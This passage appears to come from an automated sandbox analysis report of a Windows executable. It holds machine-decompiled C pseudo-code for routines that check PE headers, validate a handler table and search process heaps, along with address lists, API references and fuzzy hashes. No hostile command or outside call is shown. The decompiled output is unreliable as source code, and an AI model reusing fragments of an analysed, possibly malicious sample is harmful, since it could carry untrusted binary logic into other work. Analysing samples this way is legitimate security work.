                                                                                                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                                                    									L59:
                                                                                                                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                                                    										L46:
                                                                                                                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                                                                                                                    										 *0x417680 = 1;
                                                                                                                                                                                                                                                                                    										__eflags =  *0x417680;
                                                                                                                                                                                                                                                                                    										if( *0x417680 != 0) {
                                                                                                                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t84 =  *0x417638;
                                                                                                                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                                                                                                                    											L51:
                                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                                                                    												 *0x417680 = 0;
                                                                                                                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                                                                                                    													 *0x417638 = _t86;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                                                                    													_t68 = 0x417640 + _t94 * 4;
                                                                                                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t69 = 0x41763c + _t84 * 4;
                                                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x417640 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x417640 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *0x417680 = 1;
                                                                                                                                                                                                                                                                                    							__eflags =  *0x417680;
                                                                                                                                                                                                                                                                                    							if( *0x417680 != 0) {
                                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x417640 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(0x417640 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                                                                                                                    									L34:
                                                                                                                                                                                                                                                                                    									 *0x417680 = 0;
                                                                                                                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                                                                                                    									_t90 = 0x417640 + _t100 * 4;
                                                                                                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                                                                                                    									 *0x417638 = _t81;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x417640 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x417640 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                                                                                    0x0040ef37
                                                                                                                                                                                                                                                                                    0x0040ef3a
                                                                                                                                                                                                                                                                                    0x0040ef40
                                                                                                                                                                                                                                                                                    0x0040ef5e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ef5e
                                                                                                                                                                                                                                                                                    0x0040ef48
                                                                                                                                                                                                                                                                                    0x0040ef51
                                                                                                                                                                                                                                                                                    0x0040ef57
                                                                                                                                                                                                                                                                                    0x0040ef66
                                                                                                                                                                                                                                                                                    0x0040ef69
                                                                                                                                                                                                                                                                                    0x0040ef6c
                                                                                                                                                                                                                                                                                    0x0040ef76
                                                                                                                                                                                                                                                                                    0x0040ef76
                                                                                                                                                                                                                                                                                    0x0040ef78
                                                                                                                                                                                                                                                                                    0x0040ef7b
                                                                                                                                                                                                                                                                                    0x0040ef7d
                                                                                                                                                                                                                                                                                    0x0040ef7d
                                                                                                                                                                                                                                                                                    0x0040ef7f
                                                                                                                                                                                                                                                                                    0x0040ef82
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ef84
                                                                                                                                                                                                                                                                                    0x0040ef86
                                                                                                                                                                                                                                                                                    0x0040efec
                                                                                                                                                                                                                                                                                    0x0040efec
                                                                                                                                                                                                                                                                                    0x0040f14a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f14a
                                                                                                                                                                                                                                                                                    0x0040ef88
                                                                                                                                                                                                                                                                                    0x0040ef88
                                                                                                                                                                                                                                                                                    0x0040ef8c
                                                                                                                                                                                                                                                                                    0x0040ef8e
                                                                                                                                                                                                                                                                                    0x0040ef8e
                                                                                                                                                                                                                                                                                    0x0040ef8e
                                                                                                                                                                                                                                                                                    0x0040ef8e
                                                                                                                                                                                                                                                                                    0x0040ef91
                                                                                                                                                                                                                                                                                    0x0040ef92
                                                                                                                                                                                                                                                                                    0x0040ef95
                                                                                                                                                                                                                                                                                    0x0040ef95
                                                                                                                                                                                                                                                                                    0x0040ef99
                                                                                                                                                                                                                                                                                    0x0040ef9d
                                                                                                                                                                                                                                                                                    0x0040efab
                                                                                                                                                                                                                                                                                    0x0040efab
                                                                                                                                                                                                                                                                                    0x0040efb3
                                                                                                                                                                                                                                                                                    0x0040efb9
                                                                                                                                                                                                                                                                                    0x0040efbb
                                                                                                                                                                                                                                                                                    0x0040efbd
                                                                                                                                                                                                                                                                                    0x0040efcd
                                                                                                                                                                                                                                                                                    0x0040efda
                                                                                                                                                                                                                                                                                    0x0040efde
                                                                                                                                                                                                                                                                                    0x0040efe3
                                                                                                                                                                                                                                                                                    0x0040efe5
                                                                                                                                                                                                                                                                                    0x0040f063
                                                                                                                                                                                                                                                                                    0x0040f063
                                                                                                                                                                                                                                                                                    0x0040efe7
                                                                                                                                                                                                                                                                                    0x0040efe7
                                                                                                                                                                                                                                                                                    0x0040efe7
                                                                                                                                                                                                                                                                                    0x0040f065
                                                                                                                                                                                                                                                                                    0x0040f067
                                                                                                                                                                                                                                                                                    0x0040f148
                                                                                                                                                                                                                                                                                    0x0040f148
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f06d
                                                                                                                                                                                                                                                                                    0x0040f06d
                                                                                                                                                                                                                                                                                    0x0040f074
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f07a
                                                                                                                                                                                                                                                                                    0x0040f07e
                                                                                                                                                                                                                                                                                    0x0040f0da
                                                                                                                                                                                                                                                                                    0x0040f0dc
                                                                                                                                                                                                                                                                                    0x0040f0e4
                                                                                                                                                                                                                                                                                    0x0040f0e6
                                                                                                                                                                                                                                                                                    0x0040f0e8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0ea
                                                                                                                                                                                                                                                                                    0x0040f0f0
                                                                                                                                                                                                                                                                                    0x0040f0f2
                                                                                                                                                                                                                                                                                    0x0040f0f4
                                                                                                                                                                                                                                                                                    0x0040f109
                                                                                                                                                                                                                                                                                    0x0040f109
                                                                                                                                                                                                                                                                                    0x0040f10b
                                                                                                                                                                                                                                                                                    0x0040f13a
                                                                                                                                                                                                                                                                                    0x0040f141
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f141
                                                                                                                                                                                                                                                                                    0x0040f10f
                                                                                                                                                                                                                                                                                    0x0040f110
                                                                                                                                                                                                                                                                                    0x0040f112
                                                                                                                                                                                                                                                                                    0x0040f114
                                                                                                                                                                                                                                                                                    0x0040f114
                                                                                                                                                                                                                                                                                    0x0040f116
                                                                                                                                                                                                                                                                                    0x0040f118
                                                                                                                                                                                                                                                                                    0x0040f11a
                                                                                                                                                                                                                                                                                    0x0040f12e
                                                                                                                                                                                                                                                                                    0x0040f12e
                                                                                                                                                                                                                                                                                    0x0040f131
                                                                                                                                                                                                                                                                                    0x0040f133
                                                                                                                                                                                                                                                                                    0x0040f133
                                                                                                                                                                                                                                                                                    0x0040f134
                                                                                                                                                                                                                                                                                    0x0040f134
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f11c
                                                                                                                                                                                                                                                                                    0x0040f11c
                                                                                                                                                                                                                                                                                    0x0040f11c
                                                                                                                                                                                                                                                                                    0x0040f125
                                                                                                                                                                                                                                                                                    0x0040f126
                                                                                                                                                                                                                                                                                    0x0040f128
                                                                                                                                                                                                                                                                                    0x0040f12a
                                                                                                                                                                                                                                                                                    0x0040f12a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f11c
                                                                                                                                                                                                                                                                                    0x0040f11a
                                                                                                                                                                                                                                                                                    0x0040f0f6
                                                                                                                                                                                                                                                                                    0x0040f0fd
                                                                                                                                                                                                                                                                                    0x0040f0fd
                                                                                                                                                                                                                                                                                    0x0040f0ff
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f101
                                                                                                                                                                                                                                                                                    0x0040f102
                                                                                                                                                                                                                                                                                    0x0040f105
                                                                                                                                                                                                                                                                                    0x0040f107
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f107
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0fd
                                                                                                                                                                                                                                                                                    0x0040f080
                                                                                                                                                                                                                                                                                    0x0040f083
                                                                                                                                                                                                                                                                                    0x0040f088
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f091
                                                                                                                                                                                                                                                                                    0x0040f093
                                                                                                                                                                                                                                                                                    0x0040f099
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f09f
                                                                                                                                                                                                                                                                                    0x0040f0a5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0ab
                                                                                                                                                                                                                                                                                    0x0040f0ad
                                                                                                                                                                                                                                                                                    0x0040f0b6
                                                                                                                                                                                                                                                                                    0x0040f0ba
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0c0
                                                                                                                                                                                                                                                                                    0x0040f0c3
                                                                                                                                                                                                                                                                                    0x0040f0c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0cc
                                                                                                                                                                                                                                                                                    0x0040f0ce
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0d0
                                                                                                                                                                                                                                                                                    0x0040f0d4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f0d4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040efbf
                                                                                                                                                                                                                                                                                    0x0040efbf
                                                                                                                                                                                                                                                                                    0x0040efbf
                                                                                                                                                                                                                                                                                    0x0040efc6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040efc8
                                                                                                                                                                                                                                                                                    0x0040efc9
                                                                                                                                                                                                                                                                                    0x0040efcb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040efcb
                                                                                                                                                                                                                                                                                    0x0040eff3
                                                                                                                                                                                                                                                                                    0x0040eff5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f005
                                                                                                                                                                                                                                                                                    0x0040f007
                                                                                                                                                                                                                                                                                    0x0040f009
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f00f
                                                                                                                                                                                                                                                                                    0x0040f016
                                                                                                                                                                                                                                                                                    0x0040f042
                                                                                                                                                                                                                                                                                    0x0040f042
                                                                                                                                                                                                                                                                                    0x0040f044
                                                                                                                                                                                                                                                                                    0x0040f046
                                                                                                                                                                                                                                                                                    0x0040f05a
                                                                                                                                                                                                                                                                                    0x0040f05c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f048
                                                                                                                                                                                                                                                                                    0x0040f048
                                                                                                                                                                                                                                                                                    0x0040f048
                                                                                                                                                                                                                                                                                    0x0040f051
                                                                                                                                                                                                                                                                                    0x0040f052
                                                                                                                                                                                                                                                                                    0x0040f054
                                                                                                                                                                                                                                                                                    0x0040f056
                                                                                                                                                                                                                                                                                    0x0040f056
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f048
                                                                                                                                                                                                                                                                                    0x0040f018
                                                                                                                                                                                                                                                                                    0x0040f01b
                                                                                                                                                                                                                                                                                    0x0040f01d
                                                                                                                                                                                                                                                                                    0x0040f02f
                                                                                                                                                                                                                                                                                    0x0040f02f
                                                                                                                                                                                                                                                                                    0x0040f032
                                                                                                                                                                                                                                                                                    0x0040f034
                                                                                                                                                                                                                                                                                    0x0040f034
                                                                                                                                                                                                                                                                                    0x0040f035
                                                                                                                                                                                                                                                                                    0x0040f035
                                                                                                                                                                                                                                                                                    0x0040f03b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f01f
                                                                                                                                                                                                                                                                                    0x0040f01f
                                                                                                                                                                                                                                                                                    0x0040f01f
                                                                                                                                                                                                                                                                                    0x0040f026
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f028
                                                                                                                                                                                                                                                                                    0x0040f028
                                                                                                                                                                                                                                                                                    0x0040f029
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f029
                                                                                                                                                                                                                                                                                    0x0040f02b
                                                                                                                                                                                                                                                                                    0x0040f02d
                                                                                                                                                                                                                                                                                    0x0040f040
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f040
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040f02d
                                                                                                                                                                                                                                                                                    0x0040ef9f
                                                                                                                                                                                                                                                                                    0x0040efa2
                                                                                                                                                                                                                                                                                    0x0040efa5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040efa7
                                                                                                                                                                                                                                                                                    0x0040efa9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040efa9
                                                                                                                                                                                                                                                                                    0x0040ef6e
                                                                                                                                                                                                                                                                                    0x0040ef70
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040EFDE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 79f629e4ee2a53f84b10da4d4ab7d35b6a6dd20687e1c4aaa855ce45479e32d4
                                                                                                                                                                                                                                                                                    • Instruction ID: 3779d8d5983664079a03e216e70cb0c0b8133630b7093fc66fd107e457eda8e3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f629e4ee2a53f84b10da4d4ab7d35b6a6dd20687e1c4aaa855ce45479e32d4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5561C431704602DFDB39CE2AC98066A73A5AB85324B24847BD406EB7D2E73DEC46C65C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00408930(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				void* _v1028;
                                                                                                                                                                                                                                                                                    				long _v1032;
                                                                                                                                                                                                                                                                                    				char _v1033;
                                                                                                                                                                                                                                                                                    				signed int _v1040;
                                                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v1033 = 0;
                                                                                                                                                                                                                                                                                    				_v1032 = GetProcessHeaps(0xff,  &_v1028);
                                                                                                                                                                                                                                                                                    				if(_v1032 != 0 && _v1032 < 0x100) {
                                                                                                                                                                                                                                                                                    					_v1040 = 0;
                                                                                                                                                                                                                                                                                    					while(_v1040 < _v1032) {
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t26 + _v1040 * 4 - 0x400)) != _a4) {
                                                                                                                                                                                                                                                                                    							_v1040 = _v1040 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v1033 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                                                                    				return _v1033;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x00408939
                                                                                                                                                                                                                                                                                    0x00408952
                                                                                                                                                                                                                                                                                    0x0040895f
                                                                                                                                                                                                                                                                                    0x0040896d
                                                                                                                                                                                                                                                                                    0x00408988
                                                                                                                                                                                                                                                                                    0x004089a6
                                                                                                                                                                                                                                                                                    0x00408982
